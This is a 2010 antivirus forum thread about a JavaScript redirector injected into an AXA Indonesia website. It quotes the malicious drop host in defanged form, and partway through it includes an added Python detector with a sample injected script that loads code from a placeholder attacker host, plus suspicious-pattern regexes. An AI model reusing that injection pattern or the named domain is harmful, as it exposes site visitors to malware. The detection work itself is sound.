Avast WEBforum

Other => Viruses and worms => Topic started by: Yanto.Chiang on June 08, 2010, 06:27:54 AM

Title: AXA Financial Website was injected with JS:Illredir-CB [Trj]
Post by: Yanto.Chiang on June 08, 2010, 06:27:54 AM
Dear All,

I just got information from my friend that one of the biggest financial providers, AXA Financial, had their website injected with JS:Illredir-CB [Trj].
avast! detected that 3 locations were infected:

avast! [YANTOCHIANG-PC]: File "http://wxw.axa.co.id/DropDownMenuX.js" is infected by "JS:Illredir-CB [Trj]" virus.
"%3" task used
Version of current VPS file is 100607-2, 06/08/2010

avast! [YANTOCHIANG-PC]: File "http://wxw.axa.co.id/ie5.js" is infected by "JS:Illredir-CB [Trj]" virus.
"%3" task used
Version of current VPS file is 100607-2, 06/08/2010

avast! [YANTOCHIANG-PC]: File "http://wxw.axa.co.id/" is infected by "JS:Illredir-CB [Trj]" virus.
"%3" task used
Version of current VPS file is 100607-2, 06/08/2010

And from the summary of the website scanning tool, this website got a suspicious category:

http://www.unmaskparasites.com/security-report/


I need to know the exact location in their HTML where the script was injected.


Title: Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
Post by: Pondus on June 08, 2010, 07:38:20 AM
This page seems to be <suspicious>    1 suspicious inline script found.
http://www.UnmaskParasites.com/security-report/?page=www.axa.co.id

VirusTotal -  axa.co.id.htm - 8/41
http://www.virustotal.com/analisis/40f5bf00aacfa11860323a34260abea575772d3d292afaafe53d589f1f65337d-1275988821
Title: Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
Post by: Yanto.Chiang on June 08, 2010, 07:41:12 AM
This page seems to be <suspicious>    1 suspicious inline script found.
http://www.UnmaskParasites.com/security-report/?page=www.axa.co.id

Hi Pondus,

Yes, you are right; I just would like to know which part of this website was injected with the script.

cheers,
Title: Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
Post by: Pondus on June 08, 2010, 07:43:38 AM
not sure, but DavidR or Polonus will tell you when they arrive
Title: Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
Post by: Yanto.Chiang on June 08, 2010, 07:50:36 AM
not sure, but DavidR or Polonus will tell you when they arrive

Hi Pondus,

Thanks for your kind advice,

I need this because if I can contact their web administrator it would be helpful for them.

Since their core business is financial transactions, I am afraid it would be harmful for other clients related to AXA Financial.

cheers,
Title: Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
Post by: Yanto.Chiang on June 08, 2010, 09:18:20 AM

According to Wepawet, no harmful script was found at this website:

http://wepawet.iseclab.org/view.php?hash=040f6e2c7a680c8297f10b249fd9a01d&t=1275980714&type=js

Title: Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
Post by: kubecj on June 08, 2010, 12:08:48 PM
Definitely a malware redirector. Wepawet even finds the Russian link, but it's down.
Title: Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
Post by: Yanto.Chiang on June 08, 2010, 02:11:52 PM
Hi kubecj,

Thanks for your kind information and advice.

cheers,
Title: Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
Post by: polonus on June 08, 2010, 02:48:27 PM
Hi YantoChiang,

Make the links in your first posting so they cannot be clicked through; suspicious links should be written with wxw or htxp so the curious cannot click them and get themselves infested with malware.

If you analyze there, as kubecj pointed out to us, you would get a drop-down from here: wXw.axa.co.id/DropDownMenuX.js
to CreateElement here:  hxtp://surechip.ru:8080/google.com/google.co.ve/digitalpoint.com.php
Empty source - Could not connect to site?

polonus
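A defender-side way to answer the question raised in this thread (which script element on a page is the injected one, and which off-site host it pulls code from), as an added example that is not from the forum or from any tool named above; the HTML and the hostnames are constructed placeholders:

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page (not the real site): two legitimate menu scripts
# plus an injected inline script that builds an element loading off-site code.
SAMPLE_HTML = """<html><head>
<script src="/DropDownMenuX.js"></script>
<script src="/ie5.js"></script>
</head><body>
<div id="menu">...</div>
<script>var s=document.createElement("script");s.src="http://attacker.invalid:8080/x.php";document.body.appendChild(s);</script>
</body></html>"""

class ScriptLocator(HTMLParser):
    """Record every <script> element with its line number, src and inline body."""
    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            line, _ = self.getpos()  # 1-based line of the opening tag
            self._current = {"line": line, "src": dict(attrs).get("src"), "body": ""}

    def handle_data(self, data):
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None

# Inline constructs typical of redirector injections (runtime element creation,
# src rewriting, obfuscation helpers); tune for the site under review.
SUSPICIOUS = re.compile(r"createElement|\.src\s*=|unescape\(|eval\(|iframe", re.I)

def find_suspicious_scripts(html, site_host):
    """Return (line, reason) for scripts loaded from another host or for
    inline scripts that inject elements at runtime, so the admin knows
    exactly which line of the served HTML to inspect."""
    parser = ScriptLocator()
    parser.feed(html)
    parser.close()
    hits = []
    for s in parser.scripts:
        if s["src"]:
            host = urlparse(s["src"]).hostname
            if host and host != site_host:
                hits.append((s["line"], f"external script from {host}"))
        elif SUSPICIOUS.search(s["body"]):
            urls = re.findall(r"https?://[^\s\"']+", s["body"])
            hits.append((s["line"], "inline script loads " + ", ".join(urls)))
    return hits
```

Run it against the HTML as actually served to a browser (the injected block often differs between the file on disk and the response), not against a copy fetched by a tool the attacker's code may fingerprint.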
Title: Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
Post by: Yanto.Chiang on June 08, 2010, 03:08:27 PM
Hi Polonus,

I am sorry for the inconvenience caused, but I already fixed it.

By the way, do you know how to trace the location of those scripts?

Title: Re: AXA Financial Website was injected with JS:Illredir-CB [Trj]
Post by: polonus on June 08, 2010, 08:17:08 PM
Hi Yanto.Chiang,

I PM-ed you extensive instructions on how to do this safely and securely;
good hunt,

polonus